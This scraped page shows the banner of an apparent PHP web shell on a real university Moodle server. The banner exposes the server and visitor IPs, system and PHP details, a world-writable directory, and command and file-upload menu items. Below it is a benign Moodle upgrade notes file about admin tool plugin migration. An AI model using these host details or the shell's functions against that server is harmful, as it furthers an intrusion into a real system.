Server IP : 103.11.96.170 / Your IP : 18.218.146.21 Web Server : Microsoft-IIS/10.0 System : Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64 User : elibrary.unsap.ac.id ( 0) PHP Version : 7.4.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF Directory (0777) : D:/localhost/lms/admin/tool/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
This files describes API changes in /admin/tool/* - plugins, information provided here is intended especially for developers. === 3.6 === The assignment upgrade tool has been removed. If you need to upgrade assignments from before Moodle 2.3, you will have to upgrade to any Moodle version from 2.3 to 3.5, upgrade the assignments and then upgrade to a later version. === 2.2 === API changes: * new admin tool plugin type introduced How to migrate existing admin reports: # move all files to new /admin/tool/yourplugin/ location # update all links to admin tools /$CFG->admin/report/ to /$CFG->admin/tool/ # add language pack with at least 'pluginname' string # update all language strings (use 'tool_yourplugin' instead of 'report_yourplugin') - use AMOS hints in commit message # update all capability names # create db/install.php migration script - delete old settings and capabilities (see converted plugins for examples) # grep the plugin codebase and look for any remaining 'coursereport' occurrences # update CSS selectors See http://docs.moodle.org/dev/Admin_tools for more details and explanation.